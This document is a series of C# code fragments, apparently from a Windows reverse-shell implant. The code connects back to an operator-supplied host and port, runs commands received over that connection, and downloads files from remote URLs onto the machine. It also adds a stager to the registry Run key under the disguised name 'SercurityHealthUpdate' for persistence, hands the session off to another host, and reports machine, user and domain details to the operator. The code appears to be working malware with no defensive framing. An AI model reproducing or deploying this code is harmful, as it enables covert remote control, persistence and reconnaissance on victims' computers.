public bool ValidateArguments(string[] commandArguments) { if (commandArguments.Length == 3) { // Test whether the first argument is a valid absolute URI if (Uri.TryCreate(commandArguments[1], UriKind.Absolute, out uri)) { // Rough test for valid file path try { uploadPath = Path.GetFullPath(commandArguments[2]); return(true); } catch (Exception) { connection.SendData($"Upload: Invalid file path argument {commandArguments[2]}\n"); return(false); } } else { connection.SendData($"Upload: Invalid URL argument: {commandArguments[1]}\n"); return(false); } } else { connection.SendData($"Upload: Error - Invalid number of arguments {commandArguments.ToString()}\n"); return(false); } }
public static void Main(string[] args) { if (args.Length != 2) { throw new ArgumentException(); } else { connection = new TcpReverseConnection(); connection.StartClient(args[0], args[1]); // Initialize invoker which sets commands in its constructor CommandInvoker commandInvoker = new CommandInvoker(connection); connection.SendData($"Connected! Welcome to {Environment.MachineName}\nType 'help' to see available commands\n"); while (connection.IsConnected) { connection.SendData(prompt); // TODO: try/catch for ctrl+c close of connection - maybe attempt reconnect?? string commandReceived = connection.ReceiveData(); try { commandInvoker.ParseCommandReceived(commandReceived); } catch (Exception e) { connection.SendData($"Exception: {e.Message}"); } } } }
public void ParseCommandReceived(string commandFullString) { // Remove newline characters from command string commandFullString = commandFullString.Replace("\n", ""); // Separate any potential parameters and/or flags to commands string[] commandSplit = commandFullString.Split(' '); string command = commandSplit[0].ToLower(); //ExecuteCommand() will throw a NullReferenceException when command is not in hashtable try { // Cast the object from the hashtable to an ICommand for execution ExecuteCommand((ICommand)commands[command], commandSplit); } catch (NullReferenceException) { connection.SendData($"Invalid Command: {commandFullString}\n"); } catch (Exception e) { if (e.InnerException != null) { connection.SendData($"Error: {e.InnerException.Message}\n"); } else { connection.SendData($"Error: {e.Message}\n"); } } }
private void ReadStandardOutputThreadMethod() { try { int character; // Read() will block until something is available while ((character = runningProcess.StandardOutput.Read()) > -1) { ReadStream(character, runningProcess.StandardOutput, true); } } catch (Exception e) { activeConnection.SendData($"ProcessIoManager.ReadStandardOutputThreadMethod() - Exception {e.Message}"); } }
public void Execute(TcpReverseConnection connection, string[] commandArguments) { this.connection = connection; Dictionary <string, string> helpText = new Dictionary <string, string>(); // Check whether to display generic info about each command, or syntax information and example for a specific command if (commandArguments.Length == 2) { if (commands.ContainsKey(commandArguments[1])) { ICommand c = (ICommand)commands[commandArguments[1]]; helpText = c.Help(true); foreach (string commandName in helpText.Keys) { connection.SendData($"{commandName}{new string(' ', (25 - commandName.Length))}{helpText[commandName]}\n"); } } else { connection.SendData($"Help: Invalid argument - no command '{commandArguments[1]}' exists\n"); } } // Just get generic help text for each command else if (commandArguments.Length == 1) { List <Type> completedCommands = new List <Type>(); connection.SendData("\nCore Commands\n=============\n\n"); connection.SendData($"Command{new string(' ', 18)}Description\n-------{new string(' ', 18)}-----------\n"); foreach (string command in commands.Keys) { // Check whether helpText has already been displayed for another instance of the command if (completedCommands.Contains(commands[command].GetType())) { continue; } else { var c = (ICommand)commands[command]; helpText = c.Help(false); foreach (string commandName in helpText.Keys) { connection.SendData($"{commandName}{new string(' ', (25 - commandName.Length))}{helpText[commandName]}\n"); } completedCommands.Add(commands[command].GetType()); } } connection.SendData("\n"); } else { connection.SendData("Help: Error - too many arguments\n"); } }
public void Execute(TcpReverseConnection connection, string[] commandArguments) { this.connection = connection; if (ValidateArguments(commandArguments)) { WebClient webClient = new WebClient(); try { webClient.DownloadFile(uri.ToString(), uploadPath); connection.SendData($"Upload: Successfully uploaded file to {uploadPath}\n"); } catch (WebException e) { connection.SendData($"Upload: Error - {e.Message}\n"); } } }
/// <summary> /// Writes stager to HKLM Run key if Admin privileges found. Otherwise writes stager to HKCU run key /// </summary> private void RegistryPersistence() { // TODO: Accept user input for registry value and file names with option for default random name generation connection.SendData("[*] Writing stager to file...\n"); string fileName = WriteStagerToFile(); string key; if (CheckAdminPrivileges()) { key = @"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"; } else { key = @"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"; } Registry.SetValue(key, "SercurityHealthUpdate", fileName); connection.SendData($"[+] Stager added to Key: {key}\n"); }
public void Execute(TcpReverseConnection connection, string[] commandArguments) { this.connection = connection; //Validate command line arguments before if (ValidateArguments(commandArguments)) { connection.HandoffConenection(commandArguments[1], commandArguments[2]); } else { connection.SendData("Handoff error - incorrect number of arguments supplied\n"); } }
public void Execute(TcpReverseConnection connection, string[] commandArguments) { this.connection = connection; //This is what will return when the systeminfo command is run is this shell connection.SendData($"MachineName: {Environment.MachineName}\n"); connection.SendData($"OSVersion: {Environment.OSVersion}\n"); connection.SendData($"dotNETVersion: {Environment.Version}\n"); connection.SendData($"UserName: {Environment.UserName}\n"); connection.SendData($"DomainName: {Environment.UserDomainName}\n"); if (Environment.Is64BitOperatingSystem) { connection.SendData($"Architecture: x64\n"); } else { connection.SendData($"Archtecture: x86\n"); } }
private void OnStdOutRead(string text) { connection.SendData(text); }